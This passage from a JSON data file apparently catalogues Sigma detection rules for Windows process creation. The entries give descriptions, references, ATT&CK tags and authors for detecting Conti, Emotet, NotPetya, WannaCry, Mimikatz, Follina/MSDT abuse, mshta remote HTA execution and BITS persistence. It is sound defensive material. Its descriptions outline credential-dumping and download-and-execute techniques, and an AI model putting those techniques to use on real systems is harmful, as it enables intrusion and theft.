"creation_date": "2021/08/09", - "filename": "proc_creation_win_malware_conti_7zip.yml", - "author": "Max Altgelt, Tobias Michalski", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a command that accesses password storing registry hives via volume shadow backups", - "uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", - "value": "Sensitive Registry Access via Volume Shadow Copy", - "meta": { - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", - "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2021/08/09", - "filename": "proc_creation_win_malware_conti_shadowcopy.yml", - "author": "Max Altgelt, Tobias Michalski", - "level": "high", - "falsepositive": [ - "Some rare backup scenarios" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects typical Dridex process patterns", - "uuid": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", - "value": "Dridex Process Pattern", - "meta": { - "refs": [ - "https://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dridex.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.discovery", - "attack.t1135", - "attack.t1033" - ], - "creation_date": "2019/01/10", - "filename": "proc_creation_win_malware_dridex.yml", - "author": "Florian Roth, oscd.community", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects specific process parameters as seen in DTRACK infections", - "uuid": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", - "value": "DTRACK Process Creation", - "meta": { - "refs": [ - "https://securelist.com/my-name-is-dtrack/93338/", - "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", - "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ], - "creation_date": "2019/10/30", - "filename": "proc_creation_win_malware_dtrack.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects all Emotet like process executions that are not covered by the more generic rules", - "uuid": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", - "value": "Emotet Process Creation", - "meta": { - "refs": [ - "https://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/", - "https://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/", - "https://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/", - "https://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_emotet.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ], - "creation_date": "2019/09/30", - "filename": "proc_creation_win_malware_emotet.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", - "uuid": "032f5fb3-d959-41a5-9263-4173c802dc2b", - "value": "Formbook Process Creation", - "meta": { - "refs": [ - "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", - "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", - "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", - "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1587.001" - ], - "creation_date": "2019/09/30", - "filename": "proc_creation_win_malware_formbook.yml", - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and windows eventlogs are cleared using wevtutil", - "uuid": "79aeeb41-8156-4fac-a0cd-076495ab82a1", - "value": "NotPetya Ransomware Activity", - "meta": { - "refs": [ - "https://securelist.com/schroedingers-petya/78870/", - "https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_notpetya.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.t1070.001", - "attack.credential_access", - "attack.t1003.001", - "car.2016-04-002" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_malware_notpetya.yml", - "author": "Florian Roth, Tom Ueltschi", - "level": "critical", - "falsepositive": [ - "Admin activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects QBot like process executions", - "uuid": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "value": "QBot Process Creation", - "meta": { - "refs": [ - "https://twitter.com/killamjr/status/1179034907932315648", - "https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_qbot.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005" - ], - "creation_date": "2019/10/01", - "filename": "proc_creation_win_malware_qbot.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Ryuk ransomware activity", - "uuid": "c37510b8-2107-4b78-aa32-72f251e7a844", - "value": "Ryuk Ransomware", - "meta": { - "refs": [ - "https://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_ryuk.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2019/12/16", - "filename": "proc_creation_win_malware_ryuk.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects wscript/cscript executions of scripts located in user directories", - "uuid": "cea72823-df4d-4567-950c-0b579eaf0846", - "value": "WScript or CScript Dropper", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_script_dropper.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_malware_script_dropper.yml", - "author": "Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community", - "level": "high", - "falsepositive": [ - "Winzip", - "Other self-extractors" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. This detectors attempts to identify that activity based off a command rarely observed in an enterprise network.", - "uuid": "410ad193-a728-4107-bc79-4419789fcbf8", - "value": "Trickbot Malware Recon Activity", - "meta": { - "refs": [ - "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1482" - ], - "creation_date": "2019/12/28", - "filename": "proc_creation_win_malware_trickbot_recon_activity.yml", - "author": "David Burkett, Florian Roth", - "level": "critical", - "falsepositive": [ - "Rare System Admin Activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Trickbot malware process tree pattern in which rundll32.exe is parent of wermgr.exe", - "uuid": "58bf96d9-ff5f-44bd-8dcc-1c4f79bf3a27", - "value": "Trickbot Malware Activity", - "meta": { - "refs": [ - "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", - "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_wermgr.yml" - ], - "tags": [ - "attack.execution", - "attack.t1559" - ], - "creation_date": "2020/11/26", - "filename": "proc_creation_win_malware_trickbot_wermgr.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects WannaCry ransomware activity", - "uuid": "41d40bff-377a-43e2-8e1b-2e543069e079", - "value": "WannaCry Ransomware", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_wannacry.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", - "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_malware_wannacry.yml", - "author": "Florian Roth (rule), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "uuid": "1fac1481-2dbc-48b2-9096-753c49b4ec71", - "value": "Adwind RAT / JRAT", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", - "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_adwind.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" - ], - "creation_date": "2017/11/10", - "filename": "proc_creation_win_mal_adwind.yml", - "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Attempts to detect system changes made by Blue Mockingbird", - "uuid": "c3198a27-23a0-4c2c-af19-e5328d49680e", - "value": "Blue Mockingbird", - "meta": { - "refs": [ - "https://redcanary.com/blog/blue-mockingbird-cryptominer/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_blue_mockingbird.yml" - ], - "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" - ], - "creation_date": "2020/05/14", - "filename": "proc_creation_win_mal_blue_mockingbird.yml", - "author": "Trent Liffick (@tliffick)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects DarkSide Ransomware and helpers", - "uuid": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", - "value": "DarkSide Ransomware Pattern", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", - "https://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/", - "https://www.joesandbox.com/analysis/411752/0/html#7048BB9A06B8F2DD9D24C77F389D7B2B58D2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_darkside_ransomware.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ], - "creation_date": "2021/05/14", - "filename": "proc_creation_win_mal_darkside_ransomware.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown", - "UAC bypass method used by other malware" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "uuid": "2f974656-6d83-4059-bbdf-68ac5403422f", - "value": "Hermetic Wiper TG Process Patterns", - "meta": { - "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_hermetic_wiper_activity.yml" - ], - "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" - ], - "creation_date": "2022/02/25", - "filename": "proc_creation_win_mal_hermetic_wiper_activity.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects LockerGoga Ransomware command line.", - "uuid": "74db3488-fd28-480a-95aa-b7af626de068", - "value": "LockerGoga Ransomware", - "meta": { - "refs": [ - "https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a", - "https://blog.f-secure.com/analysis-of-lockergoga-ransomware/", - "https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_lockergoga_ransomware.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ], - "creation_date": "2020/10/18", - "filename": "proc_creation_win_mal_lockergoga_ransomware.yml", - "author": "Vasiliy Burov, oscd.community", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Ryuk Ransomware command lines", - "uuid": "0acaad27-9f02-4136-a243-c357202edd74", - "value": "Ryuk Ransomware Command Line Activity", - "meta": { - "refs": [ - "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mal_ryuk.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204" - ], - "creation_date": "2019/08/06", - "filename": "proc_creation_win_mal_ryuk.yml", - "author": "Vasiliy Burov", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a usage of the manage-bde.wsf script that may indicate an attempt of proxy execution from script", - "uuid": "c363385c-f75d-4753-a108-c1a8e28bdbda", - "value": "Suspicious Usage of the Manage-bde.wsf Script", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/", - "https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712", - "https://twitter.com/bohops/status/980659399495741441", - "https://twitter.com/JohnLaTwC/status/1223292479270600706", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_manage_bde_lolbas.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2020/10/13", - "filename": "proc_creation_win_manage_bde_lolbas.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "uuid": "15619216-e993-4721-b590-4c520615a67d", - "value": "Meterpreter or Cobalt Strike Getsystem Service Start", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "level": "high", - "falsepositive": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detection well-known mimikatz command line arguments", - "uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d", - "value": "Mimikatz Command Line", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://tools.thehacker.recipes/mimikatz/modules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mimikatz_command_line.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_mimikatz_command_line.yml", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", - "level": "medium", - "falsepositive": [ - "Legitimate Administrator using tool for password recovery" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "uuid": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "value": "MMC20 Lateral Movement", - "meta": { - "refs": [ - "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc20_lateral_movement.yml" - ], - "tags": [ - "attack.execution", - "attack.t1021.003" - ], - "creation_date": "2020/03/04", - "filename": "proc_creation_win_mmc20_lateral_movement.yml", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Windows command line executable started from MMC", - "uuid": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", - "value": "MMC Spawning Windows Shell", - "meta": { - "refs": [ - "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_spawn_shell.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.003" - ], - "creation_date": "2019/08/05", - "filename": "proc_creation_win_mmc_spawn_shell.yml", - "author": "Karneades, Swisscom CSIRT", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "uuid": "ada4b0c4-758b-46ac-9033-9004613a150d", - "value": "Modify Group Policy Settings", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modify_group_policy_settings.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_modify_group_policy_settings.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of an existing service on a compromised host in order to execute an arbitrary payload when the service is started or killed as a method of persistence.", - "uuid": "38879043-7e1e-47a9-8d46-6bec88e201df", - "value": "Modification Of Existing Services For Persistence", - "meta": { - "refs": [ - "https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modif_of_services_for_via_commandline.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1574.011" - ], - "creation_date": "2020/09/29", - "filename": "proc_creation_win_modif_of_services_for_via_commandline.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", - "uuid": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", - "value": "Monitoring For Persistence Via BITS", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", - "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1197" - ], - "creation_date": "2020/10/29", - "filename": "proc_creation_win_monitoring_for_persistence_via_bits.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", - "uuid": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", - "value": "Mouse Lock Credential Gathering", - "meta": { - "refs": [ - "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf", - "https://sourceforge.net/projects/mouselock/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mouse_lock.yml" - ], - "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" - ], - "creation_date": "2020/08/13", - "filename": "proc_creation_win_mouse_lock.yml", - "author": "Cian Heasley", - "level": "medium", - "falsepositive": [ - "Legitimate uses of Mouse Lock software" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects file execution using the msdeploy.exe lolbin", - "uuid": "646bc99f-6682-4b47-a73a-17b1b64c9d34", - "value": "Execute Files with Msdeploy.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", - "https://twitter.com/pabraeken/status/995837734379032576", - "https://twitter.com/pabraeken/status/999090532839313408", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdeploy.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2020/10/18", - "filename": "proc_creation_win_msdeploy.yml", - "author": "Beyu Denis, oscd.community", - "level": "medium", - "falsepositive": [ - "System administrator Usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", - "uuid": "258fc8ce-8352-443a-9120-8a11e4857fa5", - "value": "Execute Arbitrary Commands Using MSDT.EXE", - "meta": { - "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", - "https://twitter.com/_JohnHammond/status/1531672601067675648", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/05/29", - "filename": "proc_creation_win_msdt.yml", - "author": "Nasreddine Bencherchali (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects diagcab leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in CVE-2022-30190", - "uuid": "6545ce61-a1bd-4119-b9be-fcbee42c0cf3", - "value": "Execute MSDT.EXE Using Diagcab File", - "meta": { - "refs": [ - "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", - "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/06/09", - "filename": "proc_creation_win_msdt_diagcab.yml", - "author": "GossiTheDog (rule), frack113 (sigma version)", - "level": "high", - "falsepositive": [ - "Legitimate usage of \".diagcab\" files" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", - "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0", - "value": "MSDT.EXE Execution With Suspicious Cab Option", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1537896324837781506", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/06/21", - "filename": "proc_creation_win_msdt_susp_cab_options.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage of \".diagcab\" files" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "uuid": "7a74da6b-ea76-47db-92cc-874ad90df734", - "value": "MSDT Executed with Suspicious Parent", - "meta": { - "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" - ], - "creation_date": "2022/06/01", - "filename": "proc_creation_win_msdt_susp_parent.yml", - "author": "Nextron Systems", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", - "uuid": "94771a71-ba41-4b6e-a757-b531372eaab6", - "value": "Suspicious Minimized MSEdge Start", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1478234484881436672?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/01/11", - "filename": "proc_creation_win_msedge_minimized_download.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "uuid": "b98d0db6-511d-45de-ad02-e82a98729620", - "value": "Mshta Remotely Hosted HTA File Execution", - "meta": { - "refs": [ - "https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_http.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.005" - ], - "creation_date": "2022/08/08", - "filename": "proc_creation_win_mshta_http.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Identifies suspicious mshta.exe commands.", - "uuid": "67f113fa-e23d-4271-befa-30113b3e08b1", - "value": "Mshta JavaScript Execution", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.005" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_mshta_javascript.yml", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "high", - "falsepositive": [ 